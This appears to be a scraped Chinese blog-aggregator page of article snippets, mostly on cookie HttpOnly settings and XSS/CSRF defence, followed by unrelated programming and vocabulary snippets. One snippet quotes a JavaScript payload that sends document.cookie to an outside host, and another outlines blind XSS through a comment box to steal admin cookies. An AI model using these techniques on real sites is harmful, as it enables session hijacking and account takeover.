- XSS四-WEB攻防-XSS跨站&CSP策略&HttpOnly属性&Filter过滤器&标签闭合&事件触发
爱敲键盘的pig
前端xss网络安全
演示案例:XSS跨站-安全防御-CSPXSS跨站-安全防御-HttpOnlyXSS跨站-安全防御-XSSFilter1.CSP(Content Security Policy 内容安全策略)内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单,它的实现和执行全部由浏览器完成,开发者只需提供配置。禁止加载外域代码,防
- XSS 攻击和 CSRF 攻击的常见防御措施
Cheava
防御XSS攻击HttpOnly防止劫取Cookie用户的输入检查服务端的输出检查防御CSRF攻击验证码RefererCheckToken验证转自浅说XSS和CSRF
- [xss-3]httponly绕过
阿福超级胖
小迪安全笔记webweb安全
什么是HttpOnlyHttpOnly是包含在http返回头Set-Cookie里面的一个附加的flag,所以它是后端服务器对cookie设置的一个附加的属性,在生成cookie时使用HttpOnly标志有助于减轻客户端脚本访问受保护cookie的风险(如果浏览器支持的话)下面的例子展示了如何设置Set-Cookie返回头的语法Set-Cookie:=[;=][;expires=][;domain
- Go Session4:Session劫持防范
副班长国伟
cookieonly设置SessionID的值只允许cookie设置,而不是通过URL重置方法设置,同时设置cookie的httponly为true。属性httponly是设置是否可通过客户端脚本访问这个设置的cookie,可以防止这个cookie被XSS读取从而引起session劫持,cookie设置不会像URL重置方式那么容易获取SessionID。token在每个请求加上一个隐藏的token
- xss 盲打使用
白8080
xss前端
使用beef等内网xss平台,或外网xss平台(XSS平台-仅用于xss安全测试专用、XSS平台-(支持http/https)XSSPlatform)将生成的js脚本写到网站的留言框处,但对应的用户(尤其是admin)查看留言,就会触发脚本。在用户的电脑浏览器没有勾选httponly的选项,就可以直接获取用户的cookie。将获得的cookie,填写的对应的位置,就可以直接绕过登录,使用该用户权限
- 【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-5
youngerll
web安全安全前端
目录目录第25天:WEB漏洞-XSS跨站之原理分类及攻击手法第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记第27天:WEB漏洞-XSS跨站之代码及httponly绕过第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复第29天:WEB漏洞-CSRF及SSRF漏洞案例讲解第30天:WEB漏洞-RCE代码及命令执行漏洞全解第31天:WEB漏洞-文件操作之文件包含漏洞全解第32天:WEB
- nodejs获取与设置cookie
程序员的脱发之路
Node.js学习笔记前端社会成长之路cookienodejsjavascript
nodejs获取与设置cookie一、获取cookie1.插件下载获取cookie二、设置cookie1.基础设置2.设置过期时间-maxAge3.设置域名-domain4.设置路径-path5.设置httpOnly一、获取cookie1.插件下载在nodejs下不太好直接获取到request里面的cookie,需要安装cookie-parser插件来获取安装:npminstallcookie-p
- js存储Storage及cookie
web修理工
JavaScripthtml5javascript
Storagexss攻击xss攻击//HTTPOnly为true时,document.cookie不可浏览防止xss攻击xssexp:url=document.top.location.href;cookie=document.cookie;c=newImage();c.src=’http://www.loveshell.net/c.php?c=’+cookie+’&u=’+url;Documen
- ASP.NET Core 7 Web 使用Session
醉の虾
asp.net服务器后端
ASP.NETCore好像不能像20年前那样直接使用Session函数,我使用如下方法1、在NuGet安装以下2个包2、在Program.cs注册//注册Sessionbuilder.Services.AddSession(options=>{options.IdleTimeout=TimeSpan.FromMinutes(60);options.Cookie.HttpOnly=false;});
- cookie和session
疾风追马
设置cookiesetcookie(name,value【,expire【,path【,domain【,secure【,httponly】】】】】)expire是用于设置cookie的过期时间,时间是以秒记录的,起点是时间原点,time()+30path用于设置cookie在浏览器端显示的路径,默认把cookie设置为整站有效的cookie,/domain用于设置可访问的域名,.baidu.com
- 网站的安全架构
什么也不懂888
一、网站攻击和防御1.XSS攻击:跨站点脚本攻击。包括反射性和持久性。防范手段:消毒、HttpOnly。2.注入攻击,包括SQL注入和OS注入。3.CSRF攻击:跨站点请求伪造。防范手段:表单Token、验证码、referercheck。二、信息加密1.单向数列加密:如加密用户密码存储在数据库。常用的MD5、SHA1、加盐。2.对称加密3.非对称加密实际使用中,常常先用非对称加密对对称密钥进行安全
- cookie属性
追兔子的乌龟
cookie
下图是Chrome浏览器中的Cookie截图,属性分别有Name、Value、Domain、Path、Expires/Max-age、Size、HttpOnly、Secure、SameSite和Priority。Name和ValueName和Value是一个键值对。Name是Cookie的名称,Cookie一旦创建,名称便不可更改,一般名称不区分大小写;Value是该名称对应的Cookie的值,如
- 如何预防cookie被盗用
James_liPeng
前端八股文javascript
1.设置Cookie的HttpOnly属性为true。一般来说,跨站脚本攻击(XSS)最常见的攻击方式就是通过在交互式网站(例如论坛、微博等)中嵌入javascript脚本,当其他用户访问嵌有脚本的网页时,攻击者就能通过document.cookie窃取到用户cookie信息。如果网站开发者将cookie的httponly属性设置为true,那么浏览器客户端就不允许嵌在网页中的javascript
- cookie的httpOnly设置与使用问题
冰眸js
javascript前端
设置一个HttpOnly的cookie意味着该cookie不能通过客户端脚本(如JavaScript)进行访问。这是一个安全措施,通常用于减少某些类型的攻击,如跨站脚本攻击(XSS)。以下是如何在不同的上下文中设置HttpOnlycookie:1.在HTTP响应中:如果你正在使用纯HTTP/HTTPS(没有特定的后端语言或框架),你可以在HTTP响应的Set-Cookie头中设置HttpOnly属
- 计算机基础知识65
糖果爱上我
sqlite数据库pythondjango
cookie和session的使用#概念:cookie是客户端浏览器上的键值对#目的:为了做会话保持#来源:服务端写入的,服务端再返回的响应头中写入,浏览器会自动取出来存起来是以keyvalue形式,有过期时间、path、httponly等等#使用:只要浏览器中有cookie,再次向当前域发送请求,都会自动携带在请求头中cookie:"name=lqz;age=19"#不安全问题---》cooki
- 等保检测风险处理方案
丁丁丁梦涛
phpnginx遇见——错误提示及解决方案apachephp服务器nginx等保检测
文章目录等保检测风险处理方案1.ApacheHTTPServer"httpOnly"Cookie信息泄露漏洞(CVE-2012-0053))2.检测到目标web应用表单存在口令猜测攻击3.X-Content-Type-Options响应头缺失4.X-XSS-Protection响应头缺失5.Content-Security-Policy响应头缺失6.Referrer-Policy响应头缺失7.X-
- 回顾Django的第六天
m0_65470895
djangoservlet服务器
1.session的使用1.1Cookie客户端浏览器上的键值对----为了做会话保持-怎么来的?服务端写入的---》服务端再返回的响应头中写入---》浏览器会自动取出来--》存起来-keyvalue形式--》过期时间---》path---》httponly。。。-只要浏览器中有cookie,再次向当前域发送请求,都会自动携带-携带在请求头中得cookie字段中cookie:"name=lqz;a
- cookie,session、中间件、csrf认证相关【补充】
台州吃柴小男孩
python中间件
cookie和sessioncookie客户端浏览器上的键值对----为了做会话保持怎么来的?服务端写入的---》服务端再返回的响应头中写入---》浏览器会自动取出来--》存起来keyvalue形式--》过期时间---》path---》httponly只要浏览器中有cookie,再次向当前域发送请求,都会自动携带携带在请求头中得cookie字段中cookie:"name=xxx;age=19"不安
- 小迪渗透&WEB漏洞(叁-叁)
进击的网安攻城狮
phphtml5html
文章目录25.XSS跨站原理&攻击手法(25-32)25.1XSS的原理、危害、特点25.2反射型验证(post)25.3存储型验证25.4xss平台测试涉及资源26.XSS跨站之订单及shell箱子反杀26.1webshell箱子26.2beef-xss工具(kali环境)26.3cookie&session涉及资源27.XSS跨站代码及httponly绕过27.1httponly涉及资源28.
- session
一位有礼貌的先生
pm2自动刷新重启,会不会导致session丢失?会丢失pm2重启session会丢失么?会session为什么要存数据库里?为了持久化存储用户登录信息存session一定很安全么?只是相对于cookie存储会安全点,如果别人拿到cookie里存储的sessionid,依然可以进行冒充登录的,不过一般会设置cookie的httponly属性,这样后端设置的cookie,前端通过js是读不到的,且前
- selenium获取cookie及设置cookie
Python之战
获取cookie:在打开的页面使用self.driver.get_cookies()返回下面数据:[{'domain':'.linkedin.com','expiry':1553,'httpOnly':False,'name':'liap','path':'/','secure':False,'value':'true'},{'domain':'.linkedin.com','expiry':15
- 怎样获取和使用httponly=1的Cookie
木头软件园
自动操作浏览器浏览器cookie
1、传统方法不能获取到完整的Cookie在我们访问网站时,网站把用户数据保存在Cookie中,Cookie一般存放在用户浏览器的文件夹,具体存储方式,不同的浏览器不尽相同。怎样获得网站Cookie内容呢,只需要执行javascript脚本"document.cookie;"。这是大多数人的做法,发现它只能获取部份cookie。2、httponly是什么Cookie对比document.cookie
- 201012:注解-CommandLineRunner-Jetty-httponly-打包部署
弹钢琴的崽崽
一.注解的概念注解(Annotation),也叫元数据(Metadata),是Java5的新特性,JDK5引入了Metadata很容易的就能够调用Annotations。注解与类、接口、枚举在同一个层次,并可以应用于包、类型、构造方法、方法、成员变量、参数、本地变量的声明中,用来对这些元素进行说明注释。1.注解的语法与定义形式以@interface关键字定义注解包含成员,成员以无参数的方法的形式被
- csrf和XSS攻击分别是什么?
葛小伦的大哥
PHP面试题phpcsrfxss
csrf和XSS攻击分别是什么?CSRF的基本概念、缩写、全称:CSRF(Cross-siterequestforgery):跨站请求伪造。CSRF的攻击原理:要完成一次CSRF攻击,受害者必须满足两个必要的条件:登录受信任网站A,并在本地生成Cookie在不登出A的情况下,访问危险网站BCSRF如何防御:cookie设置httpOnly+token验证+隐藏令牌+Referer验证XSS的基本概
- 27 WEB漏洞-XSS跨站之代码及httponly绕过
山兔1
小迪安全前端xss安全
目录HttpOnly安全过滤测试HttpOnly安全过滤绕过思路演示案例:Xsslabs关卡代码过滤绕过测试HttpOnly安全过滤测试防止xss攻击,指的是攻击手法,并不是能防止XSS漏洞,httponly阻止的仅仅只是cookiehttponly在相关的脚本都是支持的,我们根据自己网站的脚本环境,有相当的开启方法httponly开启方法:https://jingyan.baidu.com/ar
- Apache2 添加 Set-Cookie HttpOnly Secure
x3455
背景:网警告诉老板,我们的网站有漏洞,要在限时内处理在被暴打一顿后准备辞职,但贫穷使我冷静,还是先来理一理思路吧。要解决问题,首先是要定位问题,并且对于程序员来说大数情况下需要反复测试验证,所以第一步先找一个工具帮我们定位问题并可以验证问题的工具Acunetix扫描确认漏洞的存在,同时方便修复后验证再查查自己的服务器版本ubuntu18.x+Apache2.4.7可以开始百度了1.Possible
- awvs 中低危漏洞
布满杂草的荆棘
漏洞相关服务器前端运维web安全
低危X-Frame-OptionsHeader未配置查看请求头中是否存在X-Frame-OptionsHeader字段会话Cookie中缺少secure属性(未设置安全标志的Cookie)当cookie设置为Secure标志时,它指示浏览器只能通过安全SSL/TLS通道访问cookie。未设置HttpOnly标志的Cookie当cookie设置为HttpOnly标志时,它指示浏览器cookie只能
- XSS & CSRF
betterangela
javascript网络前端
XSS&CSRFxss:跨站脚本攻击:注入一些非法的脚本csrf:冒充身份XSS反射型/welcome:res.send(req.query.type)输入什么就输出什么(httpOnly:false,但不是解决方案)比如:?alert(document.cookie)反射型:一定要用户先触发什么操作原因:没有对内容进行过滤,直接返回到页面上。对内容进行过滤一般是服务器写得不安全dom-base型
- 前端本地存储cookie、localstorage和sessionStorage之间的区别?
尼克_张
浏览器网络cookiesessionStoragelocalStorage
一张图看懂cookie、localStorage和sessionStorage之间的区别。1.cookiecookie的特点(1)cookie可以被服务器设置。(2)浏览器每次请求会自动带上cookie。(3)存在跨域问题。cookie的配置cookie可以设置Name,Value,Domain,Path,Expires,HttpOnly,Secure,SameSite等。HttpOnly如果co
- 信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
漏刻有时
漏刻有时web安全xss安全
系列文章目录信息服务上线渗透检测网络安全检查报告和解决方案文章目录系列文章目录前言一、XSS漏洞漏洞危害解决方案1.参数过滤2.Cookie设置HttpOnly二、安装文件目录信息泄漏漏洞证明解决方案三、后台管理路径泄漏、暴力破解、明文传输漏洞证明解决方案四、逻辑漏洞漏洞验证解决方案五、弱口令六、任意文件上传解决方案(1)上传页面增加token,上传处理程序比对(2)后缀白名单(3)检测内容是否包
- mysql主从数据同步
林鹤霄
mysql主从数据同步
配置mysql5.5主从服务器(转)
教程开始:一、安装MySQL
说明:在两台MySQL服务器192.168.21.169和192.168.21.168上分别进行如下操作,安装MySQL 5.5.22
二、配置MySQL主服务器(192.168.21.169)mysql -uroot -p &nb
- oracle学习笔记
caoyong
oracle
1、ORACLE的安装
a>、ORACLE的版本
8i,9i : i是internet
10g,11g : grid (网格)
12c : cloud (云计算)
b>、10g不支持win7
&
- 数据库,SQL零基础入门
天子之骄
sql数据库入门基本术语
数据库,SQL零基础入门
做网站肯定离不开数据库,本人之前没怎么具体接触SQL,这几天起早贪黑得各种入门,恶补脑洞。一些具体的知识点,可以让小白不再迷茫的术语,拿来与大家分享。
数据库,永久数据的一个或多个大型结构化集合,通常与更新和查询数据的软件相关
- pom.xml
一炮送你回车库
pom.xml
1、一级元素dependencies是可以被子项目继承的
2、一级元素dependencyManagement是定义该项目群里jar包版本号的,通常和一级元素properties一起使用,既然有继承,也肯定有一级元素modules来定义子元素
3、父项目里的一级元素<modules>
<module>lcas-admin-war</module>
<
- sql查地区省市县
3213213333332132
sqlmysql
-- db_yhm_city
SELECT * FROM db_yhm_city WHERE class_parent_id = 1 -- 海南 class_id = 9 港、奥、台 class_id = 33、34、35
SELECT * FROM db_yhm_city WHERE class_parent_id =169
SELECT d1.cla
- 关于监听器那些让人头疼的事
宝剑锋梅花香
画图板监听器鼠标监听器
本人初学JAVA,对于界面开发我只能说有点蛋疼,用JAVA来做界面的话确实需要一定的耐心(不使用插件,就算使用插件的话也没好多少)既然Java提供了界面开发,老师又要求做,只能硬着头皮上啦。但是监听器还真是个难懂的地方,我是上了几次课才略微搞懂了些。
- JAVA的遍历MAP
darkranger
map
Java Map遍历方式的选择
1. 阐述
对于Java中Map的遍历方式,很多文章都推荐使用entrySet,认为其比keySet的效率高很多。理由是:entrySet方法一次拿到所有key和value的集合;而keySet拿到的只是key的集合,针对每个key,都要去Map中额外查找一次value,从而降低了总体效率。那么实际情况如何呢?
为了解遍历性能的真实差距,包括在遍历ke
- POJ 2312 Battle City 优先多列+bfs
aijuans
搜索
来源:http://poj.org/problem?id=2312
题意:题目背景就是小时候玩的坦克大战,求从起点到终点最少需要多少步。已知S和R是不能走得,E是空的,可以走,B是砖,只有打掉后才可以通过。
思路:很容易看出来这是一道广搜的题目,但是因为走E和走B所需要的时间不一样,因此不能用普通的队列存点。因为对于走B来说,要先打掉砖才能通过,所以我们可以理解为走B需要两步,而走E是指需要1
- Hibernate与Jpa的关系,终于弄懂
avords
javaHibernate数据库jpa
我知道Jpa是一种规范,而Hibernate是它的一种实现。除了Hibernate,还有EclipseLink(曾经的toplink),OpenJPA等可供选择,所以使用Jpa的一个好处是,可以更换实现而不必改动太多代码。
在play中定义Model时,使用的是jpa的annotations,比如javax.persistence.Entity, Table, Column, OneToMany
- 酸爽的console.log
bee1314
console
在前端的开发中,console.log那是开发必备啊,简直直观。通过写小函数,组合大功能。更容易测试。但是在打版本时,就要删除console.log,打完版本进入开发状态又要添加,真不够爽。重复劳动太多。所以可以做些简单地封装,方便开发和上线。
/**
* log.js hufeng
* The safe wrapper for `console.xxx` functions
*
- 哈佛教授:穷人和过于忙碌的人有一个共同思维特质
bijian1013
时间管理励志人生穷人过于忙碌
一个跨学科团队今年完成了一项对资源稀缺状况下人的思维方式的研究,结论是:穷人和过于忙碌的人有一个共同思维特质,即注意力被稀缺资源过分占据,引起认知和判断力的全面下降。这项研究是心理学、行为经济学和政策研究学者协作的典范。
这个研究源于穆来纳森对自己拖延症的憎恨。他7岁从印度移民美国,很快就如鱼得水,哈佛毕业
- other operate
征客丶
OSosx
一、Mac Finder 设置排序方式,预览栏 在显示-》查看显示选项中
二、有时预览显示时,卡死在那,有可能是一些临时文件夹被删除了,如:/private/tmp[有待验证]
--------------------------------------------------------------------
若有其他凝问或文中有错误,请及时向我指出,
我好及时改正,同时也让我们一
- 【Scala五】分析Spark源代码总结的Scala语法三
bit1129
scala
1. If语句作为表达式
val properties = if (jobIdToActiveJob.contains(jobId)) {
jobIdToActiveJob(stage.jobId).properties
} else {
// this stage will be assigned to "default" po
- ZooKeeper 入门
BlueSkator
中间件zk
ZooKeeper是一个高可用的分布式数据管理与系统协调框架。基于对Paxos算法的实现,使该框架保证了分布式环境中数据的强一致性,也正是基于这样的特性,使得ZooKeeper解决很多分布式问题。网上对ZK的应用场景也有不少介绍,本文将结合作者身边的项目例子,系统地对ZK的应用场景进行一个分门归类的介绍。
值得注意的是,ZK并非天生就是为这些应用场景设计的,都是后来众多开发者根据其框架的特性,利
- MySQL取得当前时间的函数是什么 格式化日期的函数是什么
BreakingBad
mysqlDate
取得当前时间用 now() 就行。
在数据库中格式化时间 用DATE_FORMA T(date, format) .
根据格式串format 格式化日期或日期和时间值date,返回结果串。
可用DATE_FORMAT( ) 来格式化DATE 或DATETIME 值,以便得到所希望的格式。根据format字符串格式化date值:
%S, %s 两位数字形式的秒( 00,01,
- 读《研磨设计模式》-代码笔记-组合模式
bylijinnan
java设计模式
声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/
import java.util.ArrayList;
import java.util.List;
abstract class Component {
public abstract void printStruct(Str
- 4_JAVA+Oracle面试题(有答案)
chenke
oracle
基础测试题
卷面上不能出现任何的涂写文字,所有的答案要求写在答题纸上,考卷不得带走。
选择题
1、 What will happen when you attempt to compile and run the following code? (3)
public class Static {
static {
int x = 5; // 在static内有效
}
st
- 新一代工作流系统设计目标
comsci
工作算法脚本
用户只需要给工作流系统制定若干个需求,流程系统根据需求,并结合事先输入的组织机构和权限结构,调用若干算法,在流程展示版面上面显示出系统自动生成的流程图,然后由用户根据实际情况对该流程图进行微调,直到满意为止,流程在运行过程中,系统和用户可以根据情况对流程进行实时的调整,包括拓扑结构的调整,权限的调整,内置脚本的调整。。。。。
在这个设计中,最难的地方是系统根据什么来生成流
- oracle 行链接与行迁移
daizj
oracle行迁移
表里的一行对于一个数据块太大的情况有二种(一行在一个数据块里放不下)
第一种情况:
INSERT的时候,INSERT时候行的大小就超一个块的大小。Oracle把这行的数据存储在一连串的数据块里(Oracle Stores the data for the row in a chain of data blocks),这种情况称为行链接(Row Chain),一般不可避免(除非使用更大的数据
- [JShop]开源电子商务系统jshop的系统缓存实现
dinguangx
jshop电子商务
前言
jeeshop中通过SystemManager管理了大量的缓存数据,来提升系统的性能,但这些缓存数据全部都是存放于内存中的,无法满足特定场景的数据更新(如集群环境)。JShop对jeeshop的缓存机制进行了扩展,提供CacheProvider来辅助SystemManager管理这些缓存数据,通过CacheProvider,可以把缓存存放在内存,ehcache,redis,memcache
- 初三全学年难记忆单词
dcj3sjt126com
englishword
several 儿子;若干
shelf 架子
knowledge 知识;学问
librarian 图书管理员
abroad 到国外,在国外
surf 冲浪
wave 浪;波浪
twice 两次;两倍
describe 描写;叙述
especially 特别;尤其
attract 吸引
prize 奖品;奖赏
competition 比赛;竞争
event 大事;事件
O
- sphinx实践
dcj3sjt126com
sphinx
安装参考地址:http://briansnelson.com/How_to_install_Sphinx_on_Centos_Server
yum install sphinx
如果失败的话使用下面的方式安装
wget http://sphinxsearch.com/files/sphinx-2.2.9-1.rhel6.x86_64.rpm
yum loca
- JPA之JPQL(三)
frank1234
ormjpaJPQL
1 什么是JPQL
JPQL是Java Persistence Query Language的简称,可以看成是JPA中的HQL, JPQL支持各种复杂查询。
2 检索单个对象
@Test
public void querySingleObject1() {
Query query = em.createQuery("sele
- Remove Duplicates from Sorted Array II
hcx2013
remove
Follow up for "Remove Duplicates":What if duplicates are allowed at most twice?
For example,Given sorted array nums = [1,1,1,2,2,3],
Your function should return length
- Spring4新特性——Groovy Bean定义DSL
jinnianshilongnian
spring 4
Spring4新特性——泛型限定式依赖注入
Spring4新特性——核心容器的其他改进
Spring4新特性——Web开发的增强
Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC
Spring4新特性——Groovy Bean定义DSL
Spring4新特性——更好的Java泛型操作API
Spring4新
- CentOS安装Mysql5.5
liuxingguome
centos
CentOS下以RPM方式安装MySQL5.5
首先卸载系统自带Mysql:
yum remove mysql mysql-server mysql-libs compat-mysql51
rm -rf /var/lib/mysql
rm /etc/my.cnf
查看是否还有mysql软件:
rpm -qa|grep mysql
去http://dev.mysql.c
- 第14章 工具函数(下)
onestopweb
函数
index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
- POJ 1050
SaraWon
二维数组子矩阵最大和
POJ ACM第1050题的详细描述,请参照
http://acm.pku.edu.cn/JudgeOnline/problem?id=1050
题目意思:
给定包含有正负整型的二维数组,找出所有子矩阵的和的最大值。
如二维数组
0 -2 -7 0
9 2 -6 2
-4 1 -4 1
-1 8 0 -2
中和最大的子矩阵是
9 2
-4 1
-1 8
且最大和是15
- [5]设计模式——单例模式
tsface
java单例设计模式虚拟机
单例模式:保证一个类仅有一个实例,并提供一个访问它的全局访问点
安全的单例模式:
/*
* @(#)Singleton.java 2014-8-1
*
* Copyright 2014 XXXX, Inc. All rights reserved.
*/
package com.fiberhome.singleton;
- Java8全新打造,英语学习supertool
yangshangchuan
javasuperword闭包java8函数式编程
superword是一个Java实现的英文单词分析软件,主要研究英语单词音近形似转化规律、前缀后缀规律、词之间的相似性规律等等。Clean code、Fluent style、Java8 feature: Lambdas, Streams and Functional-style Programming。
升学考试、工作求职、充电提高,都少不了英语的身影,英语对我们来说实在太重要